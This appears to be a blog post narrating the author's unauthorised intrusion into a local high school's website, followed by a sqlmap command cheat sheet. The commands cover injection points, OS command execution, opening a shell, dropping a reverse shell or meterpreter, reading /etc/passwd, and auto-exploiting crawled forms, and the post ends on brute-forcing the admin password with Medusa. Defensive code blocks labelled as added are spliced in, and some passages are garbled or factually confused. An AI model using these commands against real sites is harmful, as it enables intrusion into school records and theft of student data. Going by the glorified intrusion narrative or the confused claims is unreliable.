Hacking School Websites for Fun and Profit

Introduction

When I was a kid, the only computer I knew was my mom’s Macintosh. It was used solely for watching cartoons and playing Solitaire. It wasn’t until high school that I realized computers were more than glorified televisions: they could be used to hack into things like school websites!

I remember the day when I found out that my school’s website was vulnerable to SQL injection. It was easy to do; all I had to do was add a single quote mark to the URL in my browser. The page immediately crashed, and I knew that this meant there were vulnerabilities in their database server.

In the past, hacking school websites was a great way to pass the time for bored teenagers. The problem is that it has become a lot more difficult in recent years. Nowadays, school web servers are set up differently from what they used to be. This makes it harder for a beginner to hack them.

What is a school web server?

School servers are the backbone of any school. They are used to manage the school’s network, communications, and applications to the students. They also allow teachers to access their grades and other information in real-time. A normal school website is protected by a firewall that prevents unauthorized access from outsiders. However, there are many ways to hack into a school server even if it’s protected by a firewall.

First, let’s talk about what makes up a server.

A server is basically just a computer with one or more processors running software that acts as an interface between your browser and the data stored on its disks. This means that when you visit a website, it doesn’t just “appear” out of thin air; it actually has to be located somewhere in cyberspace (the Internet).

A school server is a computer that runs the school’s web-based applications and services. The server provides a central platform for storing, processing, and providing access to information about students, staff, and other users. It manages the authentication of user identities and controls access rights to electronic resources.

A school server is made up of many different parts. The most important part of a school server is the web server, which is what allows teachers and students to access information about their classes and assignments online. The other parts include email servers, which allow teachers and students to send messages back and forth; file servers, which store documents; and database servers, which store data like grades or attendance records (this information can be accessed via the web).

School servers have become more popular in recent years because many schools have moved away from paper-based grading systems and are now using electronic ones instead—meaning that they need an effective way of storing that data digitally.

Database defined

Databases are structured collections of data, typically stored electronically on computers. A database is usually controlled by a database management system (DBMS). Together, the data, the DBMS and the applications associated with them are often called a database system, or simply a database.

Data within the most commonly used type of database in operation today is modeled in rows and columns in tables to simplify processing and data queries. This information is then easily accessible, analyzed, and organized for the user.

What is a database management system?

A DBMS enables users to create and manage a database. It also helps users create, read, update and delete data in a database, and it assists with logging and auditing functions. The DBMS provides physical and logical operations such as performance monitoring, tuning, and backup and recovery.

Some examples of popular database software or DBMSs include MySQL, Microsoft Access, Microsoft SQL Server, FileMaker Pro, Oracle Database, and dBASE.

Although different types of databases vary in the schema, data structure, and data types most suited to them, they all comprise the same five basic components.

Hardware: This is the physical device that database software runs on. Database hardware includes computers, servers, and hard drives.

Software: Database software or application gives users control of the database.

Database management system (DBMS): This software is used to manage and control databases.

Data: This is the raw information that the database stores. Database administrators organize the data to make it more meaningful.

Data access language: This is

Self-driving databases (also known as autonomous databases) are cloud-based and use machine learning to automate database tuning, security, backups, updates, and other routine management tasks traditionally performed by database administrators.

What is a MySQL database?

MySQL is primarily a relational database system queried with SQL. It has been developed and optimized for web applications and is compatible with almost every platform. As the internet changed, MySQL became a leading web development and application platform because it is designed to process millions of queries and tables.

These are indexed to make it easier to search using SQL or NoSQL queries. MySQL is an ideal solution for a school that houses departments. MySQL offers flexible on-demand functionality. MySQL is the main database server used for the creation of many of the top websites and applications in the world.

Relational databases use SQL in their user and application program interfaces. A new data category can easily be added to a relational database without having to change the existing applications.

A relational database management system (RDBMS) is used to store, manage, query, and retrieve data in a relational database. Typically, the RDBMS gives users the ability to control read/write access, specify report generation and analyze use.

How secure are school web servers?

The security of your school server relies on two main factors: its design and configuration. The first factor depends on the type of operating system used by your server (e.g., Windows or Linux). While Windows servers tend to be more vulnerable than Linux ones, both are susceptible to attacks from hackers who want to gain access to sensitive information stored on them.

The second factor is related to how you configure your server’s security settings. For example, if you enable remote desktop connections then anyone can log into it remotely through a virtual private network (VPN) connection without needing any form of authentication whatsoever.

This means that even if someone has gained unauthorized access through another means, such as a brute-force attack or SQL injection, they will still be able to connect using this method without being noticed by other users, who might otherwise notice if someone else tried logging in from an unknown IP address via SSH.

Hacking school websites

I was a little nervous about my first hack. The target was a local high school, and I’d been reading up on how to protect against breaches like mine. After all, every school has its own system for keeping track of students and teachers, and if you can get into the system, you can change records or even erase them completely.

But I knew what I had to do: find out as much as I could about the school’s web server before actually trying anything on it.

At first, I wanted to see how they were tracking students’ grades and attendance. Then, I got more interested in learning how to use their database. I wanted more power over the system.

Getting to know my target

Fingerprinting the technologies behind a web server is used to identify the operating system, browser type and version, and even the operating system version. This information can then be used by hackers to figure out which exploits will work best against your particular website.

There are many tools for recon on the web designed for use against school servers. One of my favorites is Shodan because it provides me with all kinds of useful information about my target site, including open ports. The goal was to find security vulnerabilities in the school’s website and exploit them.

Their server was running outdated Apache software, which made it vulnerable to many known exploits. I also scanned for any vulnerabilities that could be exploited through SQL injection attacks or authentication bypass errors.

The next step was to exploit the known vulnerabilities on the website using sqlmap. It didn’t take me long to find an SQL injection flaw in one of its pages, which allowed me to execute arbitrary SQL queries on the database without authentication. That would be enough for most hackers but not for me because I was looking for something more challenging than just gaining access to their database system alone.

So the next thing I did was to scan their site for hidden directories and directories that might contain files with sensitive information, such as passwords or other credentials using dirbuster, and found one that contained database backups. The backup directory had SQL injections in two files, so I exploited them using sqlmap.

What is sqlmap used for?

sqlmap is a tool for detecting SQL injection vulnerabilities. It automates identifying and exploiting SQL injections. Using SQL injection, an attacker can gain access to a database through SQL.
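The flaw that sqlmap detects comes from building SQL text out of request input. The code below is an added example, not code from the original post; the grades table, function names and sample rows are constructed for illustration. It puts a lookup that concatenates the parameter next to one that validates and binds it, using the single-quote input mentioned in the introduction:

```python
import sqlite3

def make_db():
    """Build an in-memory grades table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE grades (student_id INTEGER, course TEXT, grade TEXT)")
    db.executemany("INSERT INTO grades VALUES (?, ?, ?)",
                   [(1, "Math", "B"), (2, "Math", "A"), (3, "History", "C")])
    return db

def lookup_vulnerable(db, student_id):
    """Concatenates the raw URL parameter into the SQL text (the flaw)."""
    sql = "SELECT course, grade FROM grades WHERE student_id = " + student_id
    return db.execute(sql).fetchall()

def lookup_safe(db, student_id):
    """Validates the type, then binds the value as a query parameter."""
    if not student_id.isdecimal():
        raise ValueError("student_id must be a non-negative integer")
    sql = "SELECT course, grade FROM grades WHERE student_id = ?"
    return db.execute(sql, (int(student_id),)).fetchall()

def probe(fn, db, value):
    """Return ('rows', n), ('sql_error', msg) or ('rejected', msg) for one input."""
    try:
        return ("rows", len(fn(db, value)))
    except sqlite3.Error as exc:      # the "page crashed" symptom: a raw SQL syntax error
        return ("sql_error", str(exc))
    except ValueError as exc:         # input refused before it reaches the database
        return ("rejected", str(exc))

if __name__ == "__main__":
    db = make_db()
    for value in ["1", "1'", "1 OR 1=1"]:
        print(repr(value), probe(lookup_vulnerable, db, value), probe(lookup_safe, db, value))
```

With the concatenating version, the stray quote surfaces as a database syntax error and the tautology returns every student's rows; the bound version returns one student's rows or rejects the input.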

Useful commands worth sharing

				
GET Request Injection

sqlmap -u "http://example.com/?id=1" -p id

sqlmap -u "http://example.com/?id=*" -p id

POST Request Injection

sqlmap -u "http://example.com" --data "username=*&password=*"

Injections in Headers and other HTTP Methods
Inside cookie

sqlmap -u "http://example.com" --cookie "mycookies=*"

Inside some header

sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"

sqlmap -u "http://example.com" --headers="referer:*"

PUT Method

sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Indicate string when injection is successful

--string="string_showed_when_TRUE"

Eval

sqlmap allows the use of -e or --eval to process each payload with a Python one-liner before sending it. This makes it easy and fast to process the payload in custom ways. In the following example, the Flask session cookie is signed by Flask with the known secret before it is sent:

sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

Shell

Exec command

python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

Simple Shell

python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

Dropping a reverse-shell / meterpreter

python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

Read File

--file-read=/etc/passwd

Crawl a website with SQLmap and auto-exploit

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers

--crawl = how deep you want to crawl a site

--forms = Parse and test forms

Second Order Injection

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3

sqlmap -r 1.txt --dbms MySQL --second-order "http://<IP/domain>/joomla/administrator/index.php"
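Runs like the ones above are noisy on the server side. The following detection logic is an added example, not part of the original post; the log lines, IP addresses, sqlmap version string and pattern names are constructed. It flags sources in a web access log by sqlmap's default User-Agent and, because --random-agent removes that signal, also by the decoded shape of the query string:

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /grades.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [12/Mar/2024:10:01:05 +0000] "GET /grades.php?id=1%27 HTTP/1.1" 500 0 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
198.51.100.9 - - [12/Mar/2024:10:01:06 +0000] "GET /grades.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
192.0.2.44 - - [12/Mar/2024:10:02:10 +0000] "GET /grades.php?id=1%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
192.0.2.44 - - [12/Mar/2024:10:02:11 +0000] "GET /grades.php?id=1%27%20OR%20%271%27=%271 HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.7 - - [12/Mar/2024:10:03:00 +0000] "GET /news.php?title=O%27Brien+wins HTTP/1.1" 200 900 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                     r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Decoded query-string shapes typical of automated SQL injection testing.
SQLI_PATTERNS = {
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "time-delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "quoted-boolean": re.compile(r"'\s*(or|and)\s+'?\w+'?\s*=", re.I),
}

def classify(line):
    """Return (source_ip, reasons) for one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    reasons = set()
    if "sqlmap" in m["ua"].lower():   # default UA; absent when --random-agent is used
        reasons.add("sqlmap-user-agent")
    query = unquote_plus(m["target"].partition("?")[2])
    reasons.update(name for name, pat in SQLI_PATTERNS.items() if pat.search(query))
    if "'" in query and m["status"].startswith("5"):   # a quote alone is not enough
        reasons.add("server-error-on-quote")
    return m["ip"], reasons

def suspicious_sources(log_text):
    """Map each source IP to the union of reasons seen across its requests."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[1]:
            hits[parsed[0]] |= parsed[1]
    return dict(hits)

if __name__ == "__main__":
    print(suspicious_sources(SAMPLE_LOG))
```

An access log records only the request line, so injection points in POST bodies, cookies and headers, as targeted by some of the commands above, need application or WAF logging to become visible.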
				
			

Using Medusa to brute force admin password

Medusa is a speedy, massively parallel, modular login brute-forcer, and one of the best online brute-force password crackers. This toolkit is also widely used for ethical hacking.

The main aim of this software is to support as many services that allow remote authentication as possible. It allows thread-based parallel testing and brute-force testing with flexible user input.
